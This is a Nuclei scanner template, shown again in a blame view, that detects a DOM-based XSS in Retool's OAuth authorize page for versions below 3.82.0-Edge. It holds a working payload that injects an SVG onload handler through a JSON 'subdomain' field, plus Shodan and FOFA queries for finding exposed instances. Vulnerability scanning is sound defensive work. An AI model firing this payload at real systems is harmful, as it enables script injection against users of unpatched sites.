nuclei-templates/headless/vulnerabilities/retool/retool-dom-xss.yaml

id: retool-dom-xss

info:
  name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Retool"
    fofa-query: body="Retool"
  tags: headless,retool,dom,xss

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt(document.domain)>aaaa","accessToken":"ab"%20%7D'
        action: navigate

      - action: waitdialog
        name: subdomain_object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - subdomain_object_dom == true

      - type: word
        part: body
        words:
          - "retool"
        case-insensitive: true
# digest: 4a0a00473045022100b203e96c292816e0f1988e86c057f0ca0ad0eb07ee1e1feabc002635b95bc85a02201e94d2c68b9d782890ba91758d1edf32af13dc3b3da42c7b6419896c81aea640:922c64590222798bb761d5b6d8e72950
Create retool-dom-xss.yaml 2024-09-05 18:31:12 +00:00			`id: retool-dom-xss`

			`info:`
			`name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS`
			`author: rootxharsh,iamnoooob,pdresearch`
			`severity: high`
			`description: \|`
			`Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`shodan-query: title:"Retool"`
			`fofa-query: body="Retool"`
			`tags: headless,retool,dom,xss`

			`headless:`
			`- steps:`
			`- args:`
payload-update 2024-09-05 18:33:35 +00:00			`url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt(document.domain)>aaaa","accessToken":"ab"%20%7D'`
Create retool-dom-xss.yaml 2024-09-05 18:31:12 +00:00			`action: navigate`

			`- action: waitdialog`
			`name: subdomain_object_dom`

			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- subdomain_object_dom == true`

			`- type: word`
			`part: body`
			`words:`
			`- "retool"`
			`case-insensitive: true`
chore: sign templates 🤖 2024-09-06 15:14:39 +00:00			`# digest: 4a0a00473045022100b203e96c292816e0f1988e86c057f0ca0ad0eb07ee1e1feabc002635b95bc85a02201e94d2c68b9d782890ba91758d1edf32af13dc3b3da42c7b6419896c81aea640:922c64590222798bb761d5b6d8e72950`